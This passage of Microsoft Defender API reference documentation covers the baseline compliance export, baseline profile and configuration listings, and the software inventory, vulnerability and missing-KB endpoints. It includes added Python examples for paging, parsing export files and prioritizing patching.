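            "configurationId": config, "isApplicable": applicable, "isCompliant": compliant}


SAMPLE_PAGES = {
    FIRST_PAGE: {"value": [rec("dev-a", "P1", "1.1.1", True, False),
                           rec("dev-a", "P1", "1.1.2", True, True)],
                 "@odata.nextLink": NEXT_PAGE},
    NEXT_PAGE: {"value": [rec("dev-b", "P1", "1.1.1", False, False),
                          rec("dev-b", "P1", "1.1.2", True, True)]},
}


def sample_get_json(url):
    """Stand-in for the authenticated GET."""
    return SAMPLE_PAGES[url]


def iter_odata_collection(get_json, first_url):
    """Yield every record, following @odata.nextLink until the server omits it.

    A request that passes $top gets no nextLink, so only the first page is yielded then.
    """
    url = first_url
    while url:
        page = get_json(url)
        yield from page.get("value", [])
        url = page.get("@odata.nextLink")


def compliance_summary(records):
    """Per device: applicable configurations assessed, how many fail, and the profiles involved."""
    summary = defaultdict(lambda: {"applicable": 0, "nonCompliant": 0, "profiles": set()})
    for r in records:
        if not r.get("isApplicable"):
            continue  # not-applicable configurations never count against a device
        entry = summary[r["deviceName"]]
        entry["applicable"] += 1
        entry["profiles"].add(r["profileId"])
        if not r.get("isCompliant"):
            entry["nonCompliant"] += 1
    return dict(summary)


def noncompliant_devices(summary):
    """Device names with at least one failing applicable configuration, worst first."""
    return sorted((d for d, e in summary.items() if e["nonCompliant"]),
                  key=lambda d: summary[d]["nonCompliant"], reverse=True)


if __name__ == "__main__":
    records = list(iter_odata_collection(sample_get_json, FIRST_PAGE))
    print(noncompliant_devices(compliance_summary(records)))
```

Skipping records with isApplicable false matters: a configuration that does not apply to a device is reported with isCompliant false as well, and counting it would inflate the failure count for every device.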

2. Export security baselines assessment (via files)

2.1 API method description

Returns all security baselines assessments for all devices, on a per-device basis. It returns
a table with a separate entry for every unique combination of DeviceId, ProfileId,
ConfigurationId.

2.2 Limitations
Rate limitations for this API are 5 calls per minute and 20 calls per hour.

2.3 URL
HTTP

GET /api/machines/BaselineComplianceAssessmentExport

2.4 Parameters
sasValidHours: The number of hours that the download URLs will be valid for
(Maximum 24 hours).

2.5 Properties (via files)

Note

The files are gzip compressed and in multiline JSON format.

The download URLs are only valid for 3 hours; to change that, use the sasValidHours
parameter.

To maximize download speeds, make sure you are downloading the data from the
same Azure region where your data resides.

Some additional columns might be returned in the response. These columns are
temporary and might be removed. Only use the documented columns.

Property (ID) | Data type | Description
Export files | array[string] | A list of download URLs for files holding the current snapshot of the organization.
GeneratedTime | String | The time that the export was generated.

2.6 Example

2.6.1 Request example

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/BaselineComplianceAssessmentExport

2.6.2 Response example

JSON

{
    "@odata.context": "https://api.securitycenter.contoso.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
    "exportFiles": [
        "https://tvmexportexternalstgeus.blob.core.windows.net/temp-1ebd3d09-d06a-4aad-ab80-ebc536cec61c/2021-12-22/0500/BaselineAssessmentExport/json/OrgId=<Org Id>/_RbacGroupId=<Rbac Group Id>/part-00000-c09dfd00-2278-4735-b23a-71733751fcbc.c000.json.gz?sv=ABCD",
        "https://tvmexportexternalstgeus.blob.core.windows.net/temp-1ebd3d09-d06a-4aad-ab80-ebc536cec61c/2021-12-22/0500/BaselineAssessmentExport/json/OrgId=<Org Id>/_RbacGroupId=<Rbac Group Id>/part-00001-c09dfd00-2278-4735-b23a-71733751fcbc.c000.json.gz?sv=ABCD"
    ],
    "generatedTime": "2021-01-11T11:01:00Z"
}
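The via-files export returns SAS URLs to part files that are gzip-compressed, newline-delimited JSON, and the sasValidHours parameter is capped at 24. The following is an added example, not code from the Microsoft documentation; downloading the SAS URLs is left to whatever HTTP client the caller already uses, and the part file the code reads is constructed in memory rather than downloaded.

```python
"""Request the file-based export and parse the downloaded part files.

Added example (not Microsoft's code). Downloading the SAS URLs is left to the caller;
the part file below is constructed in memory to stand in for one downloaded file.
"""
import gzip
import io
import json
from collections import Counter

MAX_SAS_VALID_HOURS = 24  # documented maximum for sasValidHours


def export_request_path(sas_valid_hours=None):
    """Path for the export call; validates sasValidHours against the documented maximum."""
    path = "/api/machines/BaselineComplianceAssessmentExport"
    if sas_valid_hours is None:
        return path
    if not isinstance(sas_valid_hours, int) or not 0 < sas_valid_hours <= MAX_SAS_VALID_HOURS:
        raise ValueError(f"sasValidHours must be an integer in 1..{MAX_SAS_VALID_HOURS}")
    return f"{path}?sasValidHours={sas_valid_hours}"


def iter_export_records(gz_bytes):
    """Decode one part file: gzip, then one JSON record per line (blank lines ignored)."""
    with gzip.open(io.BytesIO(gz_bytes), mode="rt", encoding="utf-8") as fh:
        for line in fh:
            line = line.strip()
            if line:
                yield json.loads(line)


def noncompliant_by_profile(part_files):
    """Across all part files, count failing applicable configurations per profileId."""
    counts = Counter()
    for blob in part_files:
        for record in iter_export_records(blob):
            if record.get("isApplicable") and not record.get("isCompliant"):
                counts[record["profileId"]] += 1
    return counts


def build_sample_part_file(records):
    """Constructed stand-in for a downloaded part-NNNNN.json.gz (not a real export)."""
    body = "\n".join(json.dumps(r) for r in records) + "\n"
    return gzip.compress(body.encode("utf-8"))


# Two constructed part files, as the export splits one snapshot across several files.
SAMPLE_PART_FILES = [
    build_sample_part_file([
        {"deviceId": "d1", "profileId": "P1", "configurationId": "1.1.1", "isApplicable": True, "isCompliant": False},
        {"deviceId": "d1", "profileId": "P1", "configurationId": "1.1.2", "isApplicable": True, "isCompliant": True},
    ]),
    build_sample_part_file([
        {"deviceId": "d2", "profileId": "P2", "configurationId": "2.1", "isApplicable": False, "isCompliant": False},
        {"deviceId": "d2", "profileId": "P1", "configurationId": "1.1.1", "isApplicable": True, "isCompliant": False},
    ]),
]


if __name__ == "__main__":
    print(export_request_path(6))
    print(noncompliant_by_profile(SAMPLE_PART_FILES))
```

Streaming the gzip member line by line keeps memory flat for large tenants, where a single part file can hold hundreds of thousands of one-kilobyte records; the records are processed as they are read rather than loaded as one document.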

See also
Get security baselines assessment profiles
Get security baselines assessment configurations



List all security baselines assessment
profiles
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender Vulnerability Management? Learn more
about how you can sign up to the Microsoft Defender Vulnerability Management
public preview trial.

1. Get security baselines assessment profiles

This API retrieves a list of all security baselines assessment profiles created by the
organization.

1.1 Parameters
Supports OData V4 queries.
OData supported operators:
$filter on: id, name, operatingSystem, operatingSystemVersion, status, settingsNumber, passedDevices, totalDevices
$top with max value of 10,000.
$skip.

1.2 HTTP request

HTTP

GET /api/baselineProfiles

1.3 Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

1.4 Properties

Property | Type | Description
Id | String | Unique identifier for the specific baseline profile.
name | String | The profile name.
description | String | The profile description.
benchmark | String | The profile benchmark.
version | String | The profile version.
operatingSystem | String | The profile applicable operating system.
operatingSystemVersion | String | The profile applicable operating system version.
status | Boolean | Indicates whether the profile is active or not.
complianceLevel | String | The compliance level chosen for the profile.
settingsNumber | Int | Number of selected configurations in the profile.
createdBy | String | The user that created this profile.
lastUpdatedBy | DateTime | The last user to modify this profile.
createdOnTimeOffset | DateTime | The date and time the profile was created.
lastUpdateTimeOffset | DateTime | The date and time the profile was last updated.
passedDevices | Int | The number of devices applicable to this profile that are compliant with all of the profile configurations.
totalDevices | Int | Number of devices applicable to this profile.

1.5 Example

1.5.1 Request example

HTTP
GET https://api.securitycenter.microsoft.com/api/baselineProfiles

1.5.2 Response example

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.PublicBaselineProfileDto)",
    "value": [
        {
            "id": "02bcbb9d-d197-479e-811e-1cd5a6f9f8fa",
            "name": "Windows 10 build 1909 CIS profile",
            "description": "important",
            "benchmark": "CIS",
            "version": "1.0.0",
            "operatingSystem": "Windows 10",
            "operatingSystemVersion": "1909",
            "status": true,
            "complianceLevel": "Level 1 (L1) - Corporate/Enterprise Environment (general use)",
            "settingsNumber": 51,
            "createdBy": "user@org.net",
            "lastUpdatedBy": null,
            "createdOnTimestampUTC": "0001-01-01T00:00:00Z",
            "lastUpdateTimestampUTC": "0001-01-01T00:00:00Z",
            "passedDevices": 0,
            "totalDevices": 10
        }
    ]
}

See also
Export security baselines assessment
Get security baselines assessment configurations



List configurations in active baseline
profiles
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender Vulnerability Management? Learn more
about how you can sign up to the Microsoft Defender Vulnerability Management
public preview trial.

1. API description
This API retrieves a list of the configurations being assessed in active baseline profiles.

1.1 Parameters
Supports OData V4 queries.
OData supported operators:
$filter on: id, category, name, CCE
$top with max value of 10,000.
$skip.

1.2 HTTP request

HTTP

GET /api/baselineConfigurations

1.3 Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

1.4 Response
If successful, this method returns 200 OK with the list of baseline configurations in the
body.

1.5 Properties

Property | Type | Description
uniqueId | String | Identifier for the specific configuration across baseline benchmarks.
Id | String | Identifier of the specific configuration in the baseline benchmark.
benchmarkName | String | The name of the benchmark.
benchmarkVersion | String | The version of the benchmark. May contain operating system details.
name | String | The configuration name as it appears in the benchmark.
description | String | The configuration description as it appears in the benchmark.
category | String | The configuration category as it appears in the benchmark.
complianceLevels | String | The compliance level of the benchmark where this configuration appears.
cce | Int | The CCE for this configuration as it appears in the benchmark.
rationale | String | The rationale for this configuration as it appears in the benchmark. For STIG benchmark this isn't supplied for this configuration.
source | Array [String] | Array of the registry paths or other locations used to determine the current device setting.
recommendedValue | Array [String] | Array of the recommended value for each source returned in the 'source' property array (values returned in the same order as the source property array).
remediation | String | The recommended steps to remediate.
isCustom | Boolean | True if the configuration is customized, false if not.

1.6 Example

1.6.1 Request example

HTTP

GET https://api.securitycenter.microsoft.com/api/baselineConfigurations

1.6.2 Response example

JSON

{
    "@odata.context": "https://api-df.securitycenter.microsoft.com/api/$metadata#BaselineConfigurations",
    "value": [
        {
            "id": "9.3.9",
            "uniqueId": "CIS_1.4.0-windows_server_2016_9.3.9",
            "benchmarkName": "CIS",
            "benchmarkVersion": "1.4.0-windows_server_2016",
            "name": "(L1) Ensure 'Windows Firewall: Public: Logging: Log dropped packets' is set to 'Yes'",
            "description": "<p xmlns:xhtml=\"http://www.w3.org/1999/xhtml\">Use this option to log when Windows Firewall with Advanced Security discards an inbound packet for any reason. The log records why and when the packet was dropped. Look for entries with the word <span class=\"inline_block\">DROP</span> in the action column of the log.</p>",
            "category": "Public Profile",
            "complianceLevels": [
                "Level 1 - Domain Controller",
                "Level 1 - Member Server",
                "Level 2 - Domain Controller",
                "Level 2 - Member Server"
            ],
            "cce": "CCE-35116-3",
            "rationale": "<p xmlns:xhtml=\"http://www.w3.org/1999/xhtml\">If events are not recorded it may be difficult or impossible to determine the root cause of system problems or the unauthorized activities of malicious users.</p>",
            "remediation": "<div xmlns:xhtml=\"http://www.w3.org/1999/xhtml\"> <p> <p> To establish the recommended configuration via GP, set the following UI path to <span class=\"inline_block\">Yes</span> : </p> <code class=\"code_block\">Computer Configuration\\Policies\\Windows Settings\\Security Settings\\Windows Firewall with Advanced Security\\Windows Firewall with Advanced Security\\Windows Firewall Properties\\Public Profile\\Logging Customize\\Log dropped packets </code> <p class=\"bold\">Impact:</p> <p> <p>Information about dropped packets will be recorded in the firewall log file.</p> </p> </p> </div>",
            "recommendedValue": [
                "Equals '1'"
            ],
            "source": [
                "hkey_local_machine\\software\\policies\\microsoft\\windowsfirewall\\publicprofile\\logging\\logdroppedpackets"
            ],
            "isCustom": false
        }
    ]
}
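Both baseline list APIs above (profiles and configurations) take OData $filter, $top (maximum 10,000) and $skip, and unlike the export endpoint they do not return an @odata.nextLink, so a client pages with $skip until a page comes back short. The following is an added example, not code from the Microsoft documentation; it assumes get_json(url) is a caller-supplied authenticated GET returning the decoded body, and the profiles and configurations it reads are constructed samples (the configuration entry reuses the CCE and registry path from the documented response).

```python
"""Build OData queries for the baseline profile/configuration endpoints and page with $skip.

Added example (not Microsoft's code). get_json(url) is assumed to be a caller-supplied
authenticated GET returning the decoded body; the sample data below is constructed.
"""
from urllib.parse import parse_qs, quote, urlencode, urlsplit

MAX_TOP = 10_000  # documented maximum for $top on these endpoints


def build_odata_query(path, filter_expr=None, top=None, skip=None):
    """Append $filter/$top/$skip; keeps '$' and quotes readable, encodes spaces as %20."""
    if top is not None and not 0 < top <= MAX_TOP:
        raise ValueError(f"$top must be between 1 and {MAX_TOP}")
    params = {}
    if filter_expr:
        params["$filter"] = filter_expr
    if top is not None:
        params["$top"] = top
    if skip is not None:
        params["$skip"] = skip
    return path + ("?" + urlencode(params, quote_via=quote, safe="$'") if params else "")


def iter_with_skip(get_json, path, filter_expr=None, page_size=1000):
    """Page through an endpoint that offers $top/$skip but no @odata.nextLink."""
    skip = 0
    while True:
        page = get_json(build_odata_query(path, filter_expr, top=page_size, skip=skip))
        items = page.get("value", [])
        yield from items
        if len(items) < page_size:
            return  # a short page is the last one
        skip += page_size


def registry_sources(configurations):
    """Map each configuration's CCE to the locations the assessment reads on the device."""
    return {c["cce"]: list(c["source"]) for c in configurations if c.get("cce") and c.get("source")}


# Constructed samples; the CCE and registry path of the first configuration come from
# the documented response above.
SAMPLE_PROFILES = [
    {"id": "p1", "name": "Windows 10 build 1909 CIS profile", "status": True},
    {"id": "p2", "name": "Windows Server 2016 CIS profile", "status": True},
    {"id": "p3", "name": "Retired profile", "status": False},
]
SAMPLE_CONFIGURATIONS = [
    {"id": "9.3.9", "cce": "CCE-35116-3",
     "source": ["hkey_local_machine\\software\\policies\\microsoft\\windowsfirewall\\publicprofile\\logging\\logdroppedpackets"]},
    {"id": "1.1.1", "cce": None, "source": ["password_hist_len"]},
]


def sample_get_json(url):
    """Stand-in for the authenticated GET; honours $filter (status only), $top and $skip."""
    parts = urlsplit(url)
    q = parse_qs(parts.query)
    items = SAMPLE_PROFILES if parts.path.endswith("/api/baselineProfiles") else SAMPLE_CONFIGURATIONS
    if q.get("$filter") == ["status eq true"]:
        items = [p for p in items if p.get("status")]
    top = int(q.get("$top", [MAX_TOP])[0])
    skip = int(q.get("$skip", ["0"])[0])
    return {"value": items[skip:skip + top]}


if __name__ == "__main__":
    for profile in iter_with_skip(sample_get_json, "/api/baselineProfiles", "status eq true", page_size=2):
        print(profile["id"], profile["name"])
    print(registry_sources(SAMPLE_CONFIGURATIONS))
```

The $skip loop stops on the first short page rather than on an empty one, which saves a request on every full run; if the tenant's count happens to be an exact multiple of page_size, one extra empty page is fetched, which is harmless.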

See also
Export security baselines assessment
Get security baselines assessment profiles



Software resource type
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Methods

Method | Return Type | Description
List software | Software collection | List the organizational software inventory
Get software by ID | Software | Get a specific software by its software ID
List software version distribution | Distribution collection | List software version distribution by software ID
List machines by software | MachineRef collection | Retrieve a list of devices that are associated with the software ID
List vulnerabilities by software | Vulnerability collection | Retrieve a list of vulnerabilities associated with the software ID
Get missing KBs | KB collection | Get a list of missing KBs associated with the software ID

Properties

Property | Type | Description
id | String | Software ID
Name | String | Software name
Vendor | String | Software publisher name
Weaknesses | Long | Number of discovered vulnerabilities
publicExploit | Boolean | Public exploit exists for some of the vulnerabilities
activeAlert | Boolean | Active alert is associated with this software
exposedMachines | Long | Number of exposed devices
impactScore | Double | Exposure score impact of this software


List software inventory API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves the organization software inventory.
Supports OData V4 queries.
OData supported operators:
$filter on: id, name, and vendor properties.
$top with max value of 10,000.
$skip.

See examples at OData queries with Microsoft Defender for Endpoint.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Software.Read.All | 'Read Threat and Vulnerability Management Software information'
Delegated (work or school account) | Software.Read | 'Read Threat and Vulnerability Management Software information'

HTTP request
HTTP

GET /api/Software

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK with the software inventory in the body.

Example

Request example
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/Software

Response example
Here is an example of the response.

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Software",
"value": [
{
"id": "microsoft-_-edge",
"name": "edge",
"vendor": "microsoft",
"weaknesses": 467,
"publicExploit": true,
"activeAlert": false,
"exposedMachines": 172,
"impactScore": 2.39947438
}
...
]
}

Related topics
Microsoft Defender Vulnerability Management
Defender Vulnerability Management software inventory


Get software by ID
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Retrieves software details by ID.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Software.Read.All | 'Read Threat and Vulnerability Management Software information'
Delegated (work or school account) | Software.Read | 'Read Threat and Vulnerability Management Software information'

HTTP request
HTTP

GET /api/Software/{Id}

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK with the specified software data in the body.

Example

Request example
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/Software/microsoft-_-edge

Response example
Here's an example of the response.

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Software/$entity",
"id": "microsoft-_-edge",
"name": "edge",
"vendor": "microsoft",
"weaknesses": 467,
"publicExploit": true,
"activeAlert": false,
"exposedMachines": 172,
"impactScore": 2.39947438
}

Related topics
Microsoft Defender Vulnerability Management
Defender Vulnerability Management software inventory


List software version distribution
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Retrieves a list of your organization's software version distribution.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Software.Read.All | 'Read Threat and Vulnerability Management Software information'
Delegated (work or school account) | Software.Read | 'Read Threat and Vulnerability Management Software information'

HTTP request
HTTP

GET /api/Software/{Id}/distributions

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK with a list of software distributions data in the
body.

Example

Request example
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/Software/microsoft-_-edge/distributions

Response example
Here is an example of the response.

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Distributions",
"value": [
{
"version": "11.0.17134.1039",
"installations": 1,
"vulnerabilities": 11
},
{
"version": "11.0.18363.535",
"installations": 750,
"vulnerabilities": 0
}
...
]
}
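The Software properties listed earlier (weaknesses, publicExploit, activeAlert, exposedMachines, impactScore) and the distribution records above are enough to rank what to patch first. The following is an added example, not Microsoft's code; it works on plain dicts shaped like the two responses, and the inventory entries other than microsoft-_-edge are constructed for contrast.

```python
"""Triage helpers for the Software resource and its version distribution.

Added example, not Microsoft's code. Input is the decoded "value" list of
GET /api/Software or GET /api/Software/{Id}/distributions. The first
inventory record and both distribution records mirror the page's samples;
the remaining inventory records are constructed.
"""
from typing import Iterable


def prioritize_software(inventory: Iterable[dict]) -> list:
    """Return software ids that deserve attention first.

    A product is flagged when it has at least one discovered weakness, at
    least one exposed device, and either a public exploit or an active alert.
    Results are ordered by impactScore (highest first), then exposedMachines.
    """
    flagged = [
        s for s in inventory
        if s.get("weaknesses", 0) > 0
        and s.get("exposedMachines", 0) > 0
        and (s.get("publicExploit") or s.get("activeAlert"))
    ]
    flagged.sort(key=lambda s: (s["impactScore"], s["exposedMachines"]),
                 reverse=True)
    return [s["id"] for s in flagged]


def vulnerable_install_share(distributions: Iterable[dict]) -> float:
    """Fraction of installations on a version with at least one vulnerability.

    Returns 0.0 when there are no installations at all, so an empty or
    all-zero distribution list does not raise ZeroDivisionError.
    """
    total = vulnerable = 0
    for d in distributions:
        total += d["installations"]
        if d["vulnerabilities"] > 0:
            vulnerable += d["installations"]
    return vulnerable / total if total else 0.0


def versions_to_retire(distributions: Iterable[dict]) -> list:
    """Versions that carry vulnerabilities, most-installed first.

    Each entry is (version, installations, vulnerabilities), so the caller
    sees both how many devices are affected and how many CVEs each carries.
    """
    bad = [(d["version"], d["installations"], d["vulnerabilities"])
           for d in distributions if d["vulnerabilities"] > 0]
    bad.sort(key=lambda t: (t[1], t[2]), reverse=True)
    return bad


# Constructed sample inventory: the first record is the page's example.
SAMPLE_INVENTORY = [
    {"id": "microsoft-_-edge", "name": "edge", "vendor": "microsoft",
     "weaknesses": 467, "publicExploit": True, "activeAlert": False,
     "exposedMachines": 172, "impactScore": 2.39947438},
    {"id": "contoso-_-widget", "name": "widget", "vendor": "contoso",
     "weaknesses": 3, "publicExploit": False, "activeAlert": True,
     "exposedMachines": 12, "impactScore": 0.5},
    {"id": "fabrikam-_-tool", "name": "tool", "vendor": "fabrikam",
     "weaknesses": 0, "publicExploit": False, "activeAlert": False,
     "exposedMachines": 0, "impactScore": 0.0},
    {"id": "contoso-_-agent", "name": "agent", "vendor": "contoso",
     "weaknesses": 9, "publicExploit": True, "activeAlert": True,
     "exposedMachines": 40, "impactScore": 3.1},
]

# Mirrors the page's /api/Software/microsoft-_-edge/distributions example.
SAMPLE_DISTRIBUTIONS = [
    {"version": "11.0.17134.1039", "installations": 1, "vulnerabilities": 11},
    {"version": "11.0.18363.535", "installations": 750, "vulnerabilities": 0},
]

if __name__ == "__main__":
    print(prioritize_software(SAMPLE_INVENTORY))
    print(f"{vulnerable_install_share(SAMPLE_DISTRIBUTIONS):.4%}")
    print(versions_to_retire(SAMPLE_DISTRIBUTIONS))
```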

Related topics
Microsoft Defender Vulnerability Management
Defender Vulnerability Management software inventory
List devices by software
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Retrieves a list of device references that have this software installed.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Software.Read.All | 'Read Threat and Vulnerability Management Software information'
Delegated (work or school account) | Software.Read | 'Read Threat and Vulnerability Management Software information'

HTTP request
HTTP

GET /api/Software/{Id}/machineReferences

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK and a list of devices with the software installed
in the body.

Example

Request example
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/Software/microsoft-_-edge/machineReferences

Response example
Here is an example of the response.

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#MachineReferences",
"value": [
{
"id": "7c7e1896fa39efb0a32a2cf421d837af1b9bf762",
"computerDnsName": "dave_desktop",
"osPlatform": "Windows10",
"rbacGroupName": "GroupTwo"
},
{
"id": "7d5cc2e7c305e4a0a290392abf6707f9888fda0d",
"computerDnsName": "jane_PC",
"osPlatform": "Windows10",
"rbacGroupName": "GroupTwo"
}
...
]
}

Related topics
Microsoft Defender Vulnerability Management
Defender Vulnerability Management software inventory


List vulnerabilities by software
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Retrieve a list of vulnerabilities in the installed software.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Vulnerability.Read.All | 'Read Threat and Vulnerability Management Software information'
Delegated (work or school account) | Vulnerability.Read | 'Read Threat and Vulnerability Management Software information'

HTTP request
HTTP

GET /api/Software/{Id}/vulnerabilities

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK with a list of vulnerabilities exposed by the
specified software.

Example

Request example
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/Software/microsoft-_-edge/vulnerabilities

Response example
Here is an example of the response.

JSON

{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Collection(Analytics.Contracts.PublicAPI.PublicVulnerabilityDto)",
"value": [
{
"id": "CVE-2017-0140",
"name": "CVE-2017-0140",
"description": "A security feature bypass vulnerability
exists when Microsoft Edge improperly handles requests of different origins.
The vulnerability allows Microsoft Edge to bypass Same-Origin Policy (SOP)
restrictions, and to allow requests that should otherwise be ignored. An
attacker who successfully exploited the vulnerability could force the
browser to send data that would otherwise be restricted.In a web-based
attack scenario, an attacker could host a specially crafted website that is
designed to exploit the vulnerability through Microsoft Edge and then
convince a user to view the website. The attacker could also take advantage
of compromised websites, and websites that accept or host user-provided
content or advertisements. These websites could contain specially crafted
content that could exploit the vulnerability.The security update addresses
the vulnerability by modifying how affected Microsoft Edge handles
different-origin requests.",
"severity": "Medium",
"cvssV3": 4.2,
"exposedMachines": 1,
"publishedOn": "2017-03-14T00:00:00Z",
"updatedOn": "2019-10-03T00:03:00Z",
"publicExploit": false,
"exploitVerified": false,
"exploitInKit": false,
"exploitTypes": [],
"exploitUris": []
}
...
]
}


Get missing KBs by software ID
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Retrieves missing KBs (security updates) by software ID.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Software.Read.All | 'Read Threat and Vulnerability Management Software information'
Delegated (work or school account) | Software.Read | 'Read Threat and Vulnerability Management Software information'

HTTP request
HTTP

GET /api/Software/{Id}/getmissingkbs

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK, with the specified software missing kb data in
the body.

Example

Request
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/Software/microsoft-_-edge/getmissingkbs

Response
Here is an example of the response.

JSON
{
"@odata.context":
"https://api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.PublicProductFixDto)",
"value": [
{
"id": "4540673",
"name": "March 2020 Security Updates",
"productsNames": [
"edge"
],
"url":
"https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4540673",
"machineMissedOn": 240,
"cveAddressed": 14
},
...
]
}

Related topics
Microsoft Defender Vulnerability Management
Defender Vulnerability Management software inventory


User resource type
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
